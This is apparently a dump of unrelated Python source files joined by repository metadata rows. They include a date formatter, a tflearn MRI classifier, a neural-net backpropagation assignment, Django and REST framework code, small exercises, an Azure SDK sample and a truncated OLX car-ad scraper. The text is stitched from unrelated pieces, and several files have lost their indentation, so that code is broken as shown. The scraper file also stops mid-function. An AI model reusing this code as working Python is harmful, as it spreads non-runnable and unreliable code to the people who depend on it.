"Month without leading zeros; i.e. '1' to '12'"
return self.data.month
def N(self):
"Month abbreviation in Associated Press style. Proprietary extension."
return MONTHS_AP[self.data.month]
def o(self):
"ISO 8601 year number matching the ISO week number (W)"
return self.data.isocalendar()[0]
def O(self):
"Difference to Greenwich time in hours; e.g. '+0200', '-0430'"
seconds = self.Z()
sign = '-' if seconds < 0 else '+'
seconds = abs(seconds)
return "%s%02d%02d" % (sign, seconds // 3600, (seconds // 60) % 60)
def r(self):
"RFC 2822 formatted date; e.g. 'Thu, 21 Dec 2000 16:01:07 +0200'"
return self.format('D, j M Y H:i:s O')
def S(self):
"English ordinal suffix for the day of the month, 2 characters; i.e. 'st', 'nd', 'rd' or 'th'"
if self.data.day in (11, 12, 13): # Special case
return 'th'
last = self.data.day % 10
if last == 1:
return 'st'
if last == 2:
return 'nd'
if last == 3:
return 'rd'
return 'th'
def t(self):
"Number of days in the given month; i.e. '28' to '31'"
return '%02d' % calendar.monthrange(self.data.year, self.data.month)[1]
def T(self):
"Time zone of this machine; e.g. 'EST' or 'MDT'"
name = self.timezone and self.timezone.tzname(self.data) or None
if name is None:
name = self.format('O')
return six.text_type(name)
def U(self):
"Seconds since the Unix epoch (January 1 1970 00:00:00 GMT)"
if isinstance(self.data, datetime.datetime) and is_aware(self.data):
return int(calendar.timegm(self.data.utctimetuple()))
else:
return int(time.mktime(self.data.timetuple()))
def w(self):
"Day of the week, numeric, i.e. '0' (Sunday) to '6' (Saturday)"
return (self.data.weekday() + 1) % 7
def W(self):
"ISO-8601 week number of year, weeks starting on Monday"
# Algorithm from http://www.personal.ecu.edu/mccartyr/ISOwdALG.txt
week_number = None
jan1_weekday = self.data.replace(month=1, day=1).weekday() + 1
weekday = self.data.weekday() + 1
day_of_year = self.z()
if day_of_year <= (8 - jan1_weekday) and jan1_weekday > 4:
if jan1_weekday == 5 or (jan1_weekday == 6 and calendar.isleap(self.data.year-1)):
week_number = 53
else:
week_number = 52
else:
if calendar.isleap(self.data.year):
i = 366
else:
i = 365
if (i - day_of_year) < (4 - weekday):
week_number = 1
else:
j = day_of_year + (7 - weekday) + (jan1_weekday - 1)
week_number = j // 7
if jan1_weekday > 4:
week_number -= 1
return week_number
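        # Worked example (added note): for 2003-10-07 (a Tuesday), jan1_weekday
        # is 3 (Jan 1 2003 fell on a Wednesday), weekday is 2 and day_of_year is
        # 280, so j = 280 + 5 + 2 = 287 and 287 // 7 gives ISO week 41.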
def y(self):
"Year, 2 digits; e.g. '99'"
return six.text_type(self.data.year)[2:]
def Y(self):
"Year, 4 digits; e.g. '1999'"
return self.data.year
def z(self):
"Day of the year; i.e. '0' to '365'"
doy = self.year_days[self.data.month] + self.data.day
if self.L() and self.data.month > 2:
doy += 1
return doy
def Z(self):
"""
Time zone offset in seconds (i.e. '-43200' to '43200'). The offset for
timezones west of UTC is always negative, and for those east of UTC is
always positive.
"""
if not self.timezone:
return 0
offset = self.timezone.utcoffset(self.data)
# `offset` is a datetime.timedelta. For negative values (to the west of
# UTC) only days can be negative (days=-1) and seconds are always
# positive. e.g. UTC-1 -> timedelta(days=-1, seconds=82800, microseconds=0)
# Positive offsets have days=0
return offset.days * 86400 + offset.seconds
def format(value, format_string):
"Convenience function"
df = DateFormat(value)
return df.format(format_string)
def time_format(value, format_string):
"Convenience function"
tf = TimeFormat(value)
return tf.format(format_string)
46ad0d5fbbffd25af388851a3e9e9c76744a7ff7 | 260f8c791b853cc14c6b432a1fc917bbfaec9337 | /train.py | ab8d5ecaaa155c77c031d13e66e1c6cdd39f8466 | [] | no_license | sambd86/Brain-MRI-Classification | 842922c68394a273471329c0cbada1136abba18c | 574aa2c2a405c69557035bfc63d97d9e8724e87a | refs/heads/master | 2020-08-07T07:57:22.152591 | 2019-02-15T18:40:47 | 2019-02-15T18:40:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,624 | py | import numpy as np
IMG_PX_SIZE = 80
HM_SLICES = 16
LR = 1e-3
MODEL_NAME = 'boldvst1w-{}-{}.model.tflearn'.format(LR, '2conv')
train_data = np.load('muchdata-80-80-16.npy')
import tflearn
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.estimator import regression
convnet = input_data(shape=[None,IMG_PX_SIZE,IMG_PX_SIZE,1], name='input')
convnet = conv_2d(convnet, 32, 2, activation='relu')
convnet = max_pool_2d(convnet,2)
convnet = conv_2d(convnet, 64, 2, activation='relu')
convnet = max_pool_2d(convnet,2)
convnet = conv_2d(convnet, 32, 2, activation='relu')
convnet = max_pool_2d(convnet,2)
convnet = conv_2d(convnet, 64, 2, activation='relu')
convnet = max_pool_2d(convnet,2)
convnet = fully_connected(convnet, 1024, activation='relu')
convnet = dropout(convnet, 0.8)
convnet = fully_connected(convnet, 2, activation='softmax')
convnet = regression(convnet, optimizer='adam', learning_rate=LR,loss='categorical_crossentropy', name='targets')
model = tflearn.DNN(convnet, tensorboard_dir='log')
train = train_data[:-400]
test = train_data[-400:]
X = np.array([i[0] for i in train]).reshape(-1, IMG_PX_SIZE,IMG_PX_SIZE, 1)
Y = [i[1] for i in train]
test_x = np.array([i[0] for i in test]).reshape(-1, IMG_PX_SIZE,IMG_PX_SIZE, 1)
test_y = [i[1] for i in test]
model.fit({'input':X},{'targets': Y}, n_epoch=3, validation_set=({'input':test_x},{'targets':test_y}),
snapshot_step=500, show_metric=True, run_id=MODEL_NAME)
model.save('model.tflearn')
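# --- Added example (not in the original script): reloading the checkpoint for ---
# --- inference; tflearn restores the weights into the same graph definition.  ---
model.load('model.tflearn')
prediction = model.predict(test_x[:1])  # class probabilities for one 80x80 slice
print('sample prediction:', prediction)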
a592272c84f6a3a7394a8e55e211e79f8bdeb7e8 | 2bb1b960054b1655918b9a9255c455ca45650e26 | /Project4b/NeuralNet.py | e4169f157745102770cba3bdffc1d03c732f4012 | [] | no_license | jluo80/CS3600-Introduction-to-Artificial-Intelligent | 0a880b069544ce44936cc0c9007836539b722ae0 | 6d1f7d0257e39518f61c439776bff9ac6bfbc88f | refs/heads/master | 2021-01-20T04:54:52.010638 | 2017-04-28T23:20:26 | 2017-04-28T23:20:26 | 89,749,940 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 15,976 | py | import copy
import sys
from datetime import datetime
from math import exp
from random import random, randint, choice
class Perceptron(object):
"""
Class to represent a single Perceptron in the net.
"""
def __init__(self, inSize=1, weights=None):
        self.inSize = inSize+1 #number of perceptrons feeding into this one; add one for bias
if weights is None:
#weights of previous layers into this one, random if passed in as None
self.weights = [1.0]*self.inSize
self.setRandomWeights()
else:
self.weights = weights
def getWeightedSum(self, inActs):
"""
Returns the sum of the input weighted by the weights.
Inputs:
inActs (list<float/int>): input values, same as length as inSize
Returns:
float
The weighted sum
"""
return sum([inAct*inWt for inAct,inWt in zip(inActs,self.weights)])
def sigmoid(self, value):
"""
Return the value of a sigmoid function.
Args:
value (float): the value to get sigmoid for
Returns:
float
The output of the sigmoid function parametrized by
the value.
"""
"""YOUR CODE"""
# print value
return 1.0 / (1 + exp(-value))
def sigmoidActivation(self, inActs):
"""
Returns the activation value of this Perceptron with the given input.
Same as g(z) in book.
Remember to add 1 to the start of inActs for the bias input.
Inputs:
inActs (list<float/int>): input values, not including bias
Returns:
float
The value of the sigmoid of the weighted input
"""
"""YOUR CODE"""
# Remember to add 1 to the start of inActs for the bias input.
inActs = [1.0] + inActs
# print len(inActs)
output = self.sigmoid(self.getWeightedSum(inActs))
return output
def sigmoidDeriv(self, value):
"""
Return the value of the derivative of a sigmoid function.
Args:
value (float): the value to get sigmoid for
Returns:
float
The output of the derivative of a sigmoid function
parametrized by the value.
"""
"""YOUR CODE"""
return self.sigmoid(value) * (1 - self.sigmoid(value))
def sigmoidActivationDeriv(self, inActs):
"""
Returns the derivative of the activation of this Perceptron with the
given input. Same as g'(z) in book (note that this is not rounded.
Remember to add 1 to the start of inActs for the bias input.
Inputs:
inActs (list<float/int>): input values, not including bias
Returns:
int
The derivative of the sigmoid of the weighted input
"""
"""YOUR CODE"""
inActs = [1.0] + inActs
output = self.sigmoidDeriv(self.getWeightedSum(inActs))
return output
def updateWeights(self, inActs, alpha, delta):
"""
Updates the weights for this Perceptron given the input delta.
Remember to add 1 to the start of inActs for the bias input.
Inputs:
inActs (list<float/int>): input values, not including bias
alpha (float): The learning rate
delta (float): If this is an output, then g'(z)*error
If this is a hidden unit, then the as defined-
g'(z)*sum over weight*delta for the next layer
Returns:
float
Return the total modification of all the weights (sum of each abs(modification))
"""
totalModification = 0
"""YOUR CODE"""
inActs = [1.0] + inActs
for i in range(len(self.weights)):
weightChange = alpha * delta * inActs[i]
self.weights[i] += weightChange
totalModification += abs(weightChange)
return totalModification
def setRandomWeights(self):
"""
Generates random input weights that vary from -1.0 to 1.0
"""
for i in range(self.inSize):
self.weights[i] = (random() + .0001) * (choice([-1,1]))
def __str__(self):
""" toString """
outStr = ''
outStr += 'Perceptron with %d inputs\n'%self.inSize
outStr += 'Node input weights %s\n'%str(self.weights)
return outStr
class NeuralNet(object):
"""
Class to hold the net of perceptrons and implement functions for it.
"""
def __init__(self, layerSize):#default 3 layer, 1 percep per layer
"""
Initiates the NN with the given sizes.
Args:
layerSize (list<int>): the number of perceptrons in each layer
[16, 24, 10]: 16 inputs, 24 perceptron in first hidden layer, 10 outputs
"""
        self.layerSize = layerSize #Holds number of inputs and perceptrons in each layer
self.outputLayer = []
self.numHiddenLayers = len(layerSize)-2
self.hiddenLayers = [[] for x in range(self.numHiddenLayers)]
        self.numLayers = self.numHiddenLayers+1 # number of hidden layers + the output layer
#build hidden layer(s): one hidden layer contains 24 perceptrons
for h in range(self.numHiddenLayers):
for p in range(layerSize[h+1]):
percep = Perceptron(layerSize[h]) # num of perceps feeding into this one
self.hiddenLayers[h].append(percep)
#build output layer: output layer contains 10 perceptrons
for i in range(layerSize[-1]):
percep = Perceptron(layerSize[-2]) # num of perceps feeding into this one
self.outputLayer.append(percep)
#build layers list that holds all layers in order - use this structure
# to implement back propagation
self.layers = [self.hiddenLayers[h] for h in xrange(self.numHiddenLayers)] + [self.outputLayer]
def __str__(self):
"""toString"""
outStr = ''
outStr +='\n'
for hiddenIndex in range(self.numHiddenLayers):
outStr += '\nHidden Layer #%d'%hiddenIndex
for index in range(len(self.hiddenLayers[hiddenIndex])):
outStr += 'Percep #%d: %s'%(index,str(self.hiddenLayers[hiddenIndex][index]))
outStr +='\n'
for i in range(len(self.outputLayer)):
outStr += 'Output Percep #%d:%s'%(i,str(self.outputLayer[i]))
return outStr
def feedForward(self, inActs):
"""
Propagate input vector forward to calculate outputs.
Args:
inActs (list<float>): the input to the NN (an example)
Returns:
list<list<float/int>>
A list of lists. The first list is the input list, and the others are
lists of the output values of all perceptrons in each layer.
"""
"""YOUR CODE"""
# print self.layers[1][1] # two layers: one hidden layer(24 x 1), one output layer(10 x 1)
# print len(inActs) # one example: 16 x 1
outputs = [inActs]
for layer in self.layers:
outActs = []
for perceptron in layer:
outActs.append(perceptron.sigmoidActivation(inActs))
outputs.append(outActs)
inActs = outActs
return outputs # [[input inActs list 16 x 1], [output outActs list 24 x 1], [output final list 10 x 1]]
def backPropLearning(self, examples, alpha):
"""
Run a single iteration of backward propagation learning algorithm.
See the text and slides for pseudo code.
Args:
examples (list<tuple<list<float>,list<float>>>):
for each tuple first element is input(feature)"vector" (list)
second element is output "vector" (list)
alpha (float): the alpha to training with
Returns
tuple<float,float>
A tuple of averageError and averageWeightChange, to be used as stopping conditions.
averageError is the summed error^2/2 of all examples, divided by numExamples*numOutputs.
averageWeightChange is the summed absolute weight change of all perceptrons,
divided by the sum of their input sizes (the average weight change for a single perceptron).
"""
# print len(examples) # 2 x 1
# keep track of output
averageError = 0
averageWeightChange = 0
numWeights = 0
for example in examples:#for each example 16, 10
#keep track of deltas to use in weight change
# print example[1] # output vector
# print example[0] # input vector
deltas = [] # num of examples x num of output: 2 x 10
#Neural net output list
allLayerOutput = self.feedForward(example[0])
# print len(allLayerOutput[-1])
# print len(allLayerOutput[-2])
lastLayerOutput = allLayerOutput[-1]
#Empty output layer delta list
outDelta = [] # 10 x 1
#iterate through all output layer neurons: 10 x 1
for outputNum in xrange(len(example[1])):
gPrime = self.outputLayer[outputNum].sigmoidActivationDeriv(allLayerOutput[-2])
error = example[1][outputNum] - lastLayerOutput[outputNum] # expected - actual
delta = gPrime * error
averageError+=error*error/2
outDelta.append(delta)
deltas.append(outDelta)
"""
Backpropagate through all hidden layers, calculating and storing
the deltas for each perceptron layer.
"""
# print self.numHiddenLayers # 1
for layerNum in xrange(self.numHiddenLayers-1,-1,-1): # from the last hidden layer till the first layer
layer = self.layers[layerNum] # hidden layer + output layer
nextLayer = self.layers[layerNum+1]
hiddenDelta = []
#Iterate through all neurons in this layer
for neuronNum in xrange(len(layer)):
# layerNum = 0 which is the input layer, so basically, sigmoidActivationDeriv(previous layer output)
gPrime = layer[neuronNum].sigmoidActivationDeriv(allLayerOutput[layerNum])
                weightedSum = 0.0
                for neuronNumNext in xrange(len(nextLayer)):
                    # deltas[0] always holds the next layer's deltas at this point
                    # (the original indexed deltas[layerNum], which only works for
                    # a single hidden layer); the +1 skips the bias weight
                    weightedSum += nextLayer[neuronNumNext].weights[neuronNum + 1] * deltas[0][neuronNumNext]
delta = gPrime * weightedSum
hiddenDelta.append(delta)
deltas = [hiddenDelta]+deltas
"""Get output of all layers"""
"""
Having aggregated all deltas, update the weights of the
hidden and output layers accordingly.
"""
for numLayer in xrange(0,self.numLayers):
layer = self.layers[numLayer]
for numNeuron in xrange(len(layer)):
weightMod = layer[numNeuron].updateWeights(allLayerOutput[numLayer], alpha, deltas[numLayer][numNeuron])
averageWeightChange += weightMod
numWeights += layer[numNeuron].inSize
#end for each example
#calculate final output
averageError /= (len(examples)*len(examples[0][1])) #number of examples x length of output vector
averageWeightChange/=(numWeights)
return averageError, averageWeightChange
def buildNeuralNet(examples, alpha=0.1, weightChangeThreshold = 0.00008, hiddenLayerList = [1], maxItr = sys.maxint, startNNet = None):
"""
Train a neural net for the given input.
Args:
examples (tuple<list<tuple<list,list>>,
list<tuple<list,list>>>): A tuple of training and test examples
alpha (float): the alpha to train with
weightChangeThreshold (float): The threshold to stop training at
maxItr (int): Maximum number of iterations to run
hiddenLayerList (list<int>): The list of numbers of Perceptrons
for the hidden layer(s).
startNNet (NeuralNet): A NeuralNet to train, or none if a new NeuralNet
can be trained from random weights.
Returns
tuple<NeuralNet,float>
A tuple of the trained Neural Network and the accuracy that it achieved
once the weight modification reached the threshold, or the iteration
exceeds the maximum iteration.
"""
examplesTrain,examplesTest = examples
numIn = len(examplesTrain[0][0])
numOut = len(examplesTest[0][1])
time = datetime.now().time()
if startNNet is not None:
hiddenLayerList = [len(layer) for layer in startNNet.hiddenLayers]
print "Starting training at time %s with %d inputs, %d outputs, %s hidden layers, size of training set %d, and size of test set %d"\
%(str(time),numIn,numOut,str(hiddenLayerList),len(examplesTrain),len(examplesTest))
layerList = [numIn]+hiddenLayerList+[numOut]
nnet = NeuralNet(layerList)
if startNNet is not None:
nnet = startNNet
"""
YOUR CODE
"""
iteration = 0
trainError = 0
weightMod = 0
weightChange = sys.maxint
while iteration < maxItr and weightChange > weightChangeThreshold:
trainError, weightChange = nnet.backPropLearning(examplesTrain, alpha)
iteration = iteration + 1
"""
Iterate for as long as it takes to reach weight modification threshold
"""
# if iteration % 10 == 0:
# print '! on iteration %d; training error %f and weight change %f'%(iteration,trainError,weightChange)
# else :
# print '.',
time = datetime.now().time()
    print 'Finished after %d iterations at time %s with training error %f and weight change %f'%(iteration,str(time),trainError,weightChange)
"""
Get the accuracy of your Neural Network on the test examples.
For each test example, you should first feedforward to get the NN outputs. Then, round the list of outputs from the output layer of the neural net.
If the entire rounded list from the NN matches with the known list from the test example, then add to testCorrect, else add to testError.
"""
testError = 0
testCorrect = 0
testAccuracy=0.0 # num correct / num total
numTotal = len(examplesTest)
for feature, label in examplesTest:
# use updated weight to predict the output
predict = [round(output) for output in nnet.feedForward(feature)[-1]]
if predict == label:
testCorrect += 1
else:
testError += 1
testAccuracy = 1.0 * testCorrect / numTotal
print 'Feed Forward Test correctly classified %d, incorrectly classified %d, test percent error %f\n'%(testCorrect,testError,(1 - testAccuracy) * 100)
"""return something"""
return nnet, testAccuracy
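# --- Added example (not part of the original assignment file): a quick XOR   ---
# --- check. The (train, test) tuple matches the docstring above; the hidden  ---
# --- width and iteration cap are illustrative choices.                       ---
if __name__ == '__main__':
    xorData = [([0, 0], [0]), ([0, 1], [1]), ([1, 0], [1]), ([1, 1], [0])]
    xorNet, xorAccuracy = buildNeuralNet((xorData, xorData), alpha=0.5,
                                         hiddenLayerList=[2], maxItr=2000)
    print 'XOR test accuracy: %f' % xorAccuracy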
52ab1199935d944737191ee8695649293a30c578 | ac12fef34ba743c739c61745bdc47ef60b9c9a95 | /core/permissions.py | 05a48bc07a2d07ad41a033c368dbd431a1a479f0 | [] | no_license | learningnoobi/UserManagementApi | cc5efebc8939f6c70662424a989624371bc4dcb2 | 67a19f904e0a2d638c81d589ae5a90b9195f8185 | refs/heads/main | 2023-05-27T17:00:35.394679 | 2021-06-12T10:42:36 | 2021-06-12T10:42:36 | 373,291,017 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | from rest_framework import permissions
from .serializers import UserSerializer,CurrentUserSerializer
class ViewPermissions(permissions.BasePermission):
def has_permission(self, request, view):
data = CurrentUserSerializer(request.user).data
if not data.get("role") is None:
view_access = any(p['name'] == 'view_' + view.permission_object for p in data['role']['permissions'])
edit_access = any(p['name'] == 'edit_' + view.permission_object for p in data['role']['permissions'])
if request.method == 'GET':
return view_access or edit_access
            return edit_access
        # deny explicitly when the user has no role (the original fell through
        # and returned None, which DRF also treats as a denial)
        return False
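# --- Added illustration (not in the original file): a hypothetical view that ---
# --- opts in; 'permission_object' is the attribute has_permission reads.     ---
# class UserListView(generics.ListAPIView):
#     permission_classes = [ViewPermissions]
#     permission_object = 'users'   # GET needs view_users or edit_users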
"[email protected]"
] | |
befa8fcb42b0ff630f187373b3a5359fd8258cb8 | a91f09527b64f18b30d7aeb761f6e5d97ed67f45 | /TheMain.py | 56db697bab6623fd10eb4139b63ae35aa57bd666 | [] | no_license | Michedev/TrainingForHashCode | 469a32214ca7327b39749dd3b2cf2fe75d5f7bc6 | 2ef5a7444dbc9ced0f2159e6cc0a78263df74dd9 | refs/heads/master | 2021-01-11T15:27:15.451692 | 2017-01-30T20:51:40 | 2017-01-30T20:51:40 | 80,348,276 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | from InputParser import InputParser
from Deliver import DeliveryGuy
theParser = InputParser()
theParser.loadInput("test.in")
theDeliveryGuy = DeliveryGuy()
theDeliveryGuy.start(theParser.drones, theParser.orders, theParser.warehouses, theParser.deadline)
print (theDeliveryGuy.commands) | [
"[email protected]"
] | |
038b53660861622923bdc0d10d6cac2b42de1207 | 428ea81730a7102cb3ede62d16d16ed79cab7905 | /Mundo_1/desafio035.py | 4686757b8ed5a1954ce48f2a4e43250cad243748 | [] | no_license | reinaldoboas/Curso_em_Video_Python | 290f5387bd70caf74c06b33cdb34d9b2809088c3 | 7c36b84df957721ff20019eb90fdabdd49acaa94 | refs/heads/master | 2020-11-27T06:59:24.683947 | 2020-06-10T13:49:09 | 2020-06-10T13:49:09 | 229,346,624 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 761 | py | ### Curso em Vídeo - Exercicio: desafio035.py
### Link: https://www.youtube.com/watch?v=NZiNphKkxhg&list=PLHz_AreHm4dm6wYOIW20Nyg12TAjmMGT-&index=36
### Desenvolva um programa que leia o comprimento de três retas e diga ao usuário se elas podem ou não formar um triângulo.
comp1 = float(input("Digite o primeiro comprimento: "))
comp2 = float(input("Digite o segundo comprimento: "))
comp3 = float(input("Digite o terceiro comprimento: "))
# Para formar um triângulo é necessário que cada um dos comprimentos sejam menores do que a soma dos outros dois.
if comp1 < comp2 + comp3 and comp2 < comp1 + comp3 and comp3 < comp2 + comp1:
print("Os segmentos podem formar um triângulo!")
else:
print("Os segmentos NÂO PODEM formar um triângulo!")
| [
"[email protected]"
] | |
c5ba88ddbf30f317b40371913a3a3022c5efaeb6 | 401f6332eebcb0f665aee236a1336d6bd30b39ac | /webportal/models.py | 4063c34edd97e1af73227b054438e3b78eabf1a6 | [] | no_license | rsribas/djangoapp | 6672e533f8ee9a1f3c54c617eca30d0d50c01045 | ed02dbe652edd1c396bc766ed0aa1b4f6121aae4 | refs/heads/master | 2021-01-20T21:45:45.844339 | 2017-08-29T17:47:44 | 2017-08-29T17:47:44 | 101,788,816 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 868 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
from django.contrib.auth.models import User
#import django_tables2 as tables
class Support(models.Model):
"""Abertura de Tickets para a o NOC"""
assunto = models.CharField(max_length=200)
descricao = models.TextField()
date_added = models.DateTimeField(auto_now_add=True)
def __str__(self):
"""Devolve representacao em string do modelo"""
return self.assunto
class Module(models.Model):
"""Modulos disponiveis da aplicacao"""
name = models.CharField(max_length=50)
description = models.CharField(max_length=200)
CHOICE = (('Y','Yes'),('N','No'))
builtin = models.CharField(max_length=1, choices=CHOICE, blank=True)
# user = models.ForeignKey(User)
def __str__(self):
"""Devolve representacao em string"""
return self.name
| [
"[email protected]"
] | |
3969fa2604803a4a5f5149a43be5f14967340d9d | be7949a09fa8526299b42c4c27adbe72d59d2201 | /cnns/nnlib/test/python_tests/parse_args.py | b460897c20a5fa8622862b59fca874d6026418e8 | [
"Apache-2.0"
] | permissive | adam-dziedzic/bandlimited-cnns | 375b5cccc7ab0f23d2fbdec4dead3bf81019f0b4 | 81aaa27f1dd9ea3d7d62b661dac40cac6c1ef77a | refs/heads/master | 2022-11-25T05:40:55.044920 | 2020-06-07T16:14:34 | 2020-06-07T16:14:34 | 125,884,603 | 17 | 5 | Apache-2.0 | 2022-11-21T21:01:46 | 2018-03-19T16:02:57 | Jupyter Notebook | UTF-8 | Python | false | false | 674 | py | import argparse
parser = argparse.ArgumentParser(description='Process some integers.')
parser.add_argument('integers', metavar='N', type=int, nargs='+',
help='an integer for the accumulator')
parser.add_argument('--sum', dest='accumulate', action='store_const',
const=sum, default=max,
help='sum the integers (default: find the max)')
parser.add_argument("-e", "--epochs", help="for how many epochs to run", type=int, )
args = parser.parse_args()
print("args.integers: ", args.integers)
print("size of args.integers: ", len(args.integers))
print("args.epochs: ", args.epochs)
print(args.accumulate(args.integers))
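
# Example invocation (sketch):
#   python parse_args.py 1 2 3 --sum -e 10
# prints the integer list, its length, epochs (10), and the sum (6).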
| [
"[email protected]"
] | |
10e80daf8d1343d953d869670b653a0a5e1f970b | 82c9b71a53a37486aba79c4131caa75fa85f4e19 | /Localization/convert_img.py | be6f75f425d40c01871603c8b40c01e316c07244 | [] | no_license | diamondspark/LVSegmentation | b0750e2db8a5a8adc56a32b138eccd700ee21c5a | f0d23abeef4efd52b14359d7f1b045f6dba8d461 | refs/heads/master | 2020-12-02T06:45:42.309098 | 2017-08-03T23:20:56 | 2017-08-03T23:20:56 | 96,894,014 | 0 | 0 | null | 2017-07-11T16:23:51 | 2017-07-11T13:07:12 | Python | UTF-8 | Python | false | false | 522 | py | from image import readImage
import os
import scipy.misc

src = '/data/gabriel/LVseg/dataset/Training'

# Convert DICOM scans to PNG training images; copy PNG masks over as labels.
for j in os.listdir(src):
    for k in os.listdir(src + '/' + j):
        if '.dcm' in k:
            I = readImage(src + '/' + j + '/' + k, 'dicom')
            # the basename keeps everything up to (and excluding) the character before the dot
            scipy.misc.imsave('/data/gabriel/LVseg/dataset_img/img/Training/' + k[:k.find('.') - 1] + '.png', I)
        elif '.png' in k:
            I = readImage(src + '/' + j + '/' + k, 'png')
            scipy.misc.imsave('/data/gabriel/LVseg/dataset_img/label/Training/' + k, I)
| [
"[email protected]"
] | |
6177d284bd6e936bcf5790431d5c49eb42f90d68 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/network/azure-mgmt-network/generated_samples/express_route_circuit_peering_stats.py | f9ffa9854ccf5d162867be4267f96a7b4ecc3553 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,601 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.network import NetworkManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-network
# USAGE
python express_route_circuit_peering_stats.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = NetworkManagementClient(
credential=DefaultAzureCredential(),
subscription_id="subid",
)
response = client.express_route_circuits.get_peering_stats(
resource_group_name="rg1",
circuit_name="circuitName",
peering_name="peeringName",
)
print(response)
# x-ms-original-file: specification/network/resource-manager/Microsoft.Network/stable/2023-04-01/examples/ExpressRouteCircuitPeeringStats.json
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
a140d9e849a9ad7f7ce35a8ba56f519ec5b24da9 | 56518dd10339075dffc3d73058576b31ab1a2287 | /mystatusapp/apps.py | 4d8984bf9128f8098fa4d50e8f42a85b4d1133ef | [] | no_license | mori-0903/make_mystatus | 51349870f2bfdcb41857fb101ab1621ecd4ab640 | e50345d306036ba8cd30ddc65529edecb144b6e2 | refs/heads/main | 2023-05-31T14:39:10.360159 | 2021-06-28T12:00:42 | 2021-06-28T12:00:42 | 380,733,520 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 154 | py | from django.apps import AppConfig
class MystatusappConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'mystatusapp'
| [
"[email protected]"
] | |
f4bda8b4f5f2409aa4d584318295eff1a71ccdd5 | 9ab1139119e0a942b90286a32179b0b37b9f2bd4 | /main.py | 9fe9b7d8fefe491e34d8c2a2fefdbdab44493dda | [] | no_license | carlsec/olx_cars | 3a15a24f2b89640a6b95e93a02bfad6d574afca7 | 9ac706b3ff46a38e9ede5afa66a58d67d1a63570 | refs/heads/main | 2023-05-30T16:29:50.898474 | 2021-06-21T02:20:40 | 2021-06-21T02:20:40 | 378,564,614 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,627 | py | from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from bs4 import BeautifulSoup
import pandas as pd
from tqdm import tqdm
import requests
import numpy as np
import datetime
import time
import os
list_fuels = ['Gasolina', 'Flex', 'Diesel', 'Gás Natural', 'Etanol']
list_types = ['SUV', 'Sedã', 'Passeio', 'Hatch', 'Pick-up', 'Van/Utilitário', 'Conversível']
list_poten = ['1.8', '1.6', '1.0','1.7', '2.0 - 2.9', '1.5', '1.4', '1.3', '4.0 ou mais']
list_directions = ['Hidráulica', 'Elétrica', 'Mecânica']
list_changes = ['Manual', 'Automático', 'Semi-Automático']
list_colors = ['Branco', 'Prata', 'Verde', 'Azul', 'Amarelo', 'Vermelho', 'Preto', 'Cinza']
list_doors = ['4 portas', '2 portas']
def search_links():
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument("--headless")    # run Chrome without a visible window
    chrome_options.add_argument("--no-sandbox")
    driver = webdriver.Chrome(executable_path='chromedriver', options=chrome_options)
    links = []
    for pagina in tqdm(range(1)):
        url = 'https://sp.olx.com.br/autos-e-pecas/carros-vans-e-utilitarios?o={}&sf=1'.format(pagina)
        driver.get(url=url)
        html = driver.page_source
        # each ad card on the page starts with this CSS class marker
        html_splited = html.split("sc-1fcmfeb-2 juiJqh")
        for anuncio in html_splited:
            try:
                soup = BeautifulSoup(anuncio, 'html.parser')
                elemento_link = soup.find("a", {"data-lurker-detail": "list_id"})
                link = elemento_link.get("href")
            except:
                pass
            else:
                links.append(link)
    return links
def apro(content, list_):
    # return the text of the first element found in list_, or '' if none matches
    for i in range(len(content)):
        text = content[i].text
        if text in list_:
            return text
    return ''

def number(content):
    # return the first element text that parses as an integer (the km reading), or ''
    for i in range(len(content)):
        try:
            return int(content[i].text)
        except ValueError:
            continue
    return ""
def fipe_brand(name_brand, fipe_json):
try:
for n in range(len(fipe_json)):
fipe_brand = fipe_json[n]['fipe_name'].upper()
if name_brand == fipe_brand:
return fipe_json[n]['id']
return 'Not'
except:
return ''
def fipe_carr(name_carr, r_carros):
try:
for n in range(len(r_carros)):
fipe_carr = r_carros[n]['fipe_name'].upper()
#print(fipe_carr)
point_fipe_carr = fipe_carr[-1]
point_name_carr = name_carr[-1]
if point_fipe_carr == '.':
point_fipe_carr = True
else:
point_fipe_carr = False
if point_name_carr == '.':
point_name_carr = True
else:
point_name_carr = False
if point_fipe_carr == True and point_name_carr == False:
fipe_carr = fipe_carr[:-1]
elif point_fipe_carr == False and point_name_carr == True:
name_carr = name_carr[:-1]
if name_carr == fipe_carr:
return r_carros[n]['id']
